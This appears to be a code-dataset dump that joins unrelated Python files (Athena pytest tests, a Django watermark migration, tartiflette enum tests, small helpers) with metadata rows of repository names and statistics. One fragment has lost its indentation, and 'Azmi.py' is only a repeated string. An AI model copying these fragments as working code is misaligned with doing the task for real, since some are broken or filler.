rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(),
rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand(), rand()
""",
database=database)
client_athena.stop_query_execution(QueryExecutionId=query_execution_id)
with pytest.raises(QueryCancelled):
assert session.athena.wait_query(query_execution_id=query_execution_id)
def test_query_failed(session, database):
query_execution_id = session.athena.run_query(query="SELECT random(-1)", database=database)
with pytest.raises(QueryFailed):
assert session.athena.wait_query(query_execution_id=query_execution_id)
| 68.708995 | 115 | 0.531187 | 1,506 | 12,986 | 4.543161 | 0.073705 | 1.359836 | 2.038001 | 2.714996 | 0.768927 | 0.749196 | 0.744519 | 0.744519 | 0.734288 | 0.720257 | 0 | 0.002047 | 0.172339 | 12,986 | 188 | 116 | 69.074468 | 0.634537 | 0 | 0 | 0.64497 | 0 | 0.579882 | 0.772601 | 0.017711 | 0 | 0 | 0 | 0 | 0.011834 | 1 | 0.047337 | false | 0 | 0.035503 | 0 | 0.08284 | 0.011834 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
3a1bc736fd8d821723eccf9448db029ab5d5c381 | 2,787 | py | Python | sym/water/migrations/0001_initial.py | panyuan5056/sy | 9cc7cdff52b495ffedbb3cca3f583c600a64f571 | [
"Apache-2.0"
] | null | null | null | sym/water/migrations/0001_initial.py | panyuan5056/sy | 9cc7cdff52b495ffedbb3cca3f583c600a64f571 | [
"Apache-2.0"
] | null | null | null | sym/water/migrations/0001_initial.py | panyuan5056/sy | 9cc7cdff52b495ffedbb3cca3f583c600a64f571 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.7 on 2021-03-12 09:32
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Decoder',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('service', models.CharField(max_length=20, verbose_name='服务')),
('upload', models.FileField(upload_to='', verbose_name='上传文件')),
('message', models.CharField(max_length=200, verbose_name='水印数据')),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Encoder',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('service', models.CharField(max_length=20, verbose_name='服务')),
('upload', models.FileField(upload_to='', verbose_name='上传文件')),
('message', models.CharField(max_length=200, verbose_name='水印数据')),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Log',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('service', models.CharField(max_length=20, verbose_name='服务')),
('upload', models.CharField(max_length=20, verbose_name='上传文件名')),
('status', models.CharField(max_length=20, verbose_name='状态')),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Manage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('service', models.CharField(max_length=20, verbose_name='应用')),
('name', models.CharField(max_length=20, verbose_name='名称')),
('token', models.CharField(max_length=20, verbose_name='token')),
('message', models.TextField(verbose_name='备注')),
('status', models.CharField(max_length=20, verbose_name='状态')),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
],
),
]
| 45.688525 | 114 | 0.573018 | 283 | 2,787 | 5.434629 | 0.233216 | 0.128739 | 0.128739 | 0.171652 | 0.843953 | 0.843953 | 0.843953 | 0.775683 | 0.775683 | 0.775683 | 0 | 0.019364 | 0.277359 | 2,787 | 60 | 115 | 46.45 | 0.74429 | 0.016146 | 0 | 0.698113 | 1 | 0 | 0.093796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.018868 | 0 | 0.09434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
28f476120edfe742314c1bd4dd80fe2b35341518 | 140 | py | Python | librarians/core/views.py | ProjetoDeDev/librarians | 6c23280981ac8804d84a4f840c5604447f5775b8 | [
"MIT"
] | 1 | 2020-08-26T02:18:30.000Z | 2020-08-26T02:18:30.000Z | librarians/core/views.py | ProjetoDeDev/librarians | 6c23280981ac8804d84a4f840c5604447f5775b8 | [
"MIT"
] | null | null | null | librarians/core/views.py | ProjetoDeDev/librarians | 6c23280981ac8804d84a4f840c5604447f5775b8 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.shortcuts import redirect
def redirect_to_admin(request):
return redirect('/admin') | 23.333333 | 37 | 0.785714 | 18 | 140 | 6 | 0.611111 | 0.185185 | 0.351852 | 0.462963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 140 | 6 | 38 | 23.333333 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0.042553 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
28fa653519fff46d4390f711fffe54c11fd373e5 | 4,735 | py | Python | tests/unit/language/ast/test_enum_type_extension.py | matt-koevort/tartiflette | 5777866b133d846ce4f8aa03f735fa81832896cd | [
"MIT"
] | 530 | 2019-06-04T11:45:36.000Z | 2022-03-31T09:29:56.000Z | tests/unit/language/ast/test_enum_type_extension.py | matt-koevort/tartiflette | 5777866b133d846ce4f8aa03f735fa81832896cd | [
"MIT"
] | 242 | 2019-06-04T11:53:08.000Z | 2022-03-28T07:06:27.000Z | tests/unit/language/ast/test_enum_type_extension.py | matt-koevort/tartiflette | 5777866b133d846ce4f8aa03f735fa81832896cd | [
"MIT"
] | 36 | 2019-06-21T06:40:27.000Z | 2021-11-04T13:11:16.000Z | import pytest
from tartiflette.language.ast import EnumTypeExtensionNode
def test_enumtypeextensionnode__init__():
enum_type_extension_node = EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
)
assert enum_type_extension_node.name == "enumTypeExtensionName"
assert enum_type_extension_node.directives == "enumTypeExtensionDirectives"
assert enum_type_extension_node.values == "enumTypeExtensionValues"
assert enum_type_extension_node.location == "enumTypeExtensionLocation"
@pytest.mark.parametrize(
"enum_type_extension_node,other,expected",
[
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
Ellipsis,
False,
),
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
EnumTypeExtensionNode(
name="enumTypeExtensionNameBis",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
False,
),
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectivesBis",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
False,
),
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValuesBis",
location="enumTypeExtensionLocation",
),
False,
),
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocationBis",
),
False,
),
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
True,
),
],
)
def test_enumtypeextensionnode__eq__(
enum_type_extension_node, other, expected
):
assert (enum_type_extension_node == other) is expected
@pytest.mark.parametrize(
"enum_type_extension_node,expected",
[
(
EnumTypeExtensionNode(
name="enumTypeExtensionName",
directives="enumTypeExtensionDirectives",
values="enumTypeExtensionValues",
location="enumTypeExtensionLocation",
),
"EnumTypeExtensionNode("
"name='enumTypeExtensionName', "
"directives='enumTypeExtensionDirectives', "
"values='enumTypeExtensionValues', "
"location='enumTypeExtensionLocation')",
)
],
)
def test_enumtypeextensionnode__repr__(enum_type_extension_node, expected):
assert enum_type_extension_node.__repr__() == expected
| 35.074074 | 79 | 0.589652 | 228 | 4,735 | 12.017544 | 0.162281 | 0.127737 | 0.218248 | 0.265693 | 0.837226 | 0.788321 | 0.737956 | 0.707299 | 0.707299 | 0.65438 | 0 | 0 | 0.332207 | 4,735 | 134 | 80 | 35.335821 | 0.86654 | 0 | 0 | 0.685039 | 0 | 0 | 0.336431 | 0.335797 | 0 | 0 | 0 | 0 | 0.047244 | 1 | 0.023622 | false | 0 | 0.015748 | 0 | 0.03937 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
e9061f8873671fd6b2a35762d2456872ef36b0db | 65 | py | Python | lambda/core/mathutils.py | juanjoSanz/terraform-terragrunt-aws-lambda-tutorial | ed5a238aad6f26915562a934efd83a2c618ec862 | [
"MIT"
] | 16 | 2020-12-13T23:25:54.000Z | 2022-02-24T11:38:05.000Z | lambda/core/mathutils.py | srinivas325/terraform-terragrunt-aws-lambda-tutorial | ed5a238aad6f26915562a934efd83a2c618ec862 | [
"MIT"
] | null | null | null | lambda/core/mathutils.py | srinivas325/terraform-terragrunt-aws-lambda-tutorial | ed5a238aad6f26915562a934efd83a2c618ec862 | [
"MIT"
] | 10 | 2021-01-22T09:59:48.000Z | 2022-02-24T11:38:08.000Z | import numpy
def get_zeros():
return numpy.zeros((2,2))
| 13 | 30 | 0.630769 | 10 | 65 | 4 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 0.230769 | 65 | 4 | 31 | 16.25 | 0.76 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
3aa6a2f3a9fce58e57562d451bf2499c4a000f5d | 23 | py | Python | test/tinypy/tinypy/tmp1.py | xupingmao/subpy | c956f151ed1ebd2faeaf1565352b59ca5a8fa0b4 | [
"MIT"
] | 6 | 2015-10-11T15:06:54.000Z | 2016-07-03T06:06:52.000Z | test/tinypy/tinypy/tmp1.py | xupingmao/snake | c956f151ed1ebd2faeaf1565352b59ca5a8fa0b4 | [
"MIT"
] | 7 | 2015-08-03T12:01:21.000Z | 2016-04-24T09:00:09.000Z | test/tinypy/tinypy/tmp1.py | xupingmao/snake | c956f151ed1ebd2faeaf1565352b59ca5a8fa0b4 | [
"MIT"
] | 2 | 2016-04-18T14:51:25.000Z | 2016-04-18T15:07:09.000Z | def test(): print('OK') | 23 | 23 | 0.608696 | 4 | 23 | 3.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 23 | 1 | 23 | 23 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | true | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 7 |
3ab41316ba274efd06ec09a6db0adc4dd732ea8b | 392,020 | py | Python | Azmi.py | azmatalism/Azmi | faaa21da25973a583106b71fca3fd3c7e933c9fa | [
"Apache-2.0"
] | null | null | null | Azmi.py | azmatalism/Azmi | faaa21da25973a583106b71fca3fd3c7e933c9fa | [
"Apache-2.0"
] | null | null | null | Azmi.py | azmatalism/Azmi | faaa21da25973a583106b71fca3fd3c7e933c9fa | [
"Apache-2.0"
] | null | null | null | hamzah=(
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
